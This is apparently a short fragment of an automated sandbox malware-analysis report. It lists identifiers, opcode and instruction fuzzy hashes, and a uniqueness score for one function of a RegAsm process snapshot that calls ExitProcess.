          • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
          Similarity
          • API ID: ExitProcess
          • String ID: 8C
          • API String ID: 621844428-2849189062
          • Opcode ID: ba1dc857f609b9581e0c0bc08f4ec890d78d3abdb69fe2eddc72efd21a42c279
          • Instruction ID: a4409df68f48b988d27b223d85f266bb36461cc51f7b8507b1b5986e734ebe17
          • Opcode Fuzzy Hash: ba1dc857f609b9581e0c0bc08f4ec890d78d3abdb69fe2eddc72efd21a42c279
          • Instruction Fuzzy Hash: 72915D70508B818FD325CF38C494B12BFE1AB56314F09C69DD4EA4B7E2C779A409CBA6
          Uniqueness

          Uniqueness Score: -1.00%